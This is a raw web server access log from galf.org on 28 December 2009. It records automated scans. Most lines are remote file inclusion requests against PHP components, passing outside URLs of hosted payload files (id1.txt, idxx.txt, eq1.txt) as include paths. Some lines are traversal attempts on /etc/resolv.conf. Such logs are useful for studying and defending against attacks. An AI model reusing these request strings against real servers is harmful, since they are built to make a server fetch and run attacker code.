64.62.128.254 - - [28/Dec/2009:05:21:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:08 -0800] "GET /logs/access_090713.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:08 -0800] "GET /logs/access_090713.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:21:13 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:19 -0800] "GET /logs/access_090817.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:20 -0800] "GET /logs/access_090817.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.0" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:33 -0800] "GET /logs/access_090706.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:21:34 -0800] "GET /logs/access_090706.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.47.237.17 - - [28/Dec/2009:05:21:55 -0800] "GET /logs/access_091012.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:05 -0800] "GET /logs/access_090615.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:05 -0800] "GET /logs/access_090615.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:10 -0800] "GET /logs/access_090824.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:10 -0800] "GET /logs/access_090824.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:22:22 -0800] "GET /logs/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:22:22 -0800] "GET /phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:22:23 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:38 -0800] "GET /logs/access_090622.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:22:39 -0800] "GET /logs/access_090622.log//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:23:53 -0800] "GET /logs/access_090817.log%20//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:23:53 -0800] "GET /logs/access_090817.log%20//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:24:07 -0800] "GET /logs/access_090824.log%20//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:05:24:07 -0800] "GET /logs/access_090824.log%20//header.php?abspath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:24:18 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.30.227.243 - - [28/Dec/2009:05:24:19 -0800] "GET /phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:24:19 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:24:19 -0800] "GET /logs/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:24:38 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:05:24:44 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://ourfathersworld.org/wp-content/themes/default/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:24:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:25:21 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:25:29 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:26:28 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.172.162.163 - - [28/Dec/2009:05:27:04 -0800] "GET /logs/access_090921.log%20%20/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.172.162.163 - - [28/Dec/2009:05:27:05 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.172.162.163 - - [28/Dec/2009:05:27:06 -0800] "GET /logs/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:27:10 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:27:10 -0800] "GET /phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:27:10 -0800] "GET /logs/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:28:52 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:01 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:01 -0800] "GET /logs/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:01 -0800] "GET /phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:13 -0800] "GET /logs/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:13 -0800] "GET /logs/access_090615.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:29:13 -0800] "GET /phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:29:28 -0800] "GET /logs/access_090706.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:29:28 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:29:28 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:30:04 -0800] "GET /logs/access_091221.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:30:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:30:04 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:30:10 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:30:13 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:30:24 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:31:07 -0800] "GET /logs/access_090615.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:31:55 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:32:02 -0800] "GET /logs/access_090824.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:34:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:16 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:17 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:17 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:17 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:18 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:25 -0800] "GET /logs/access_091123.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:25 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:25 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:36:39 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:36:39 -0800] "GET /atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:36:39 -0800] "GET /logs//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:36:39 -0800] "GET /logs/access_090629.log%20%20//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:36:44 -0800] "GET /logs/access_091019.log%20%20//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:45 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:45 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:45 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:47 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:47 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:36:47 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:12 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:12 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:12 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:16 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:16 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:16 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:18 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:20 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:33 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:42 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:43 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:44 -0800] "GET /logs/access.log%20%20//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:44 -0800] "GET /logs//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:52 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:37:59 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:04 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:08 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:10 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:13 -0800] "GET /logs/access_090921.log///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:13 -0800] "GET /logs///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:13 -0800] "GET //?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:16 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:19 -0800] "GET /logs/access_091123.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:28 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:32 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:05:38:42 -0800] "GET /logs/access.log//shop//main.php?_shop_path=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:57 -0800] "GET //?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:58 -0800] "GET /logs/access_090921.log///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Dec/2009:05:38:58 -0800] "GET /logs///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
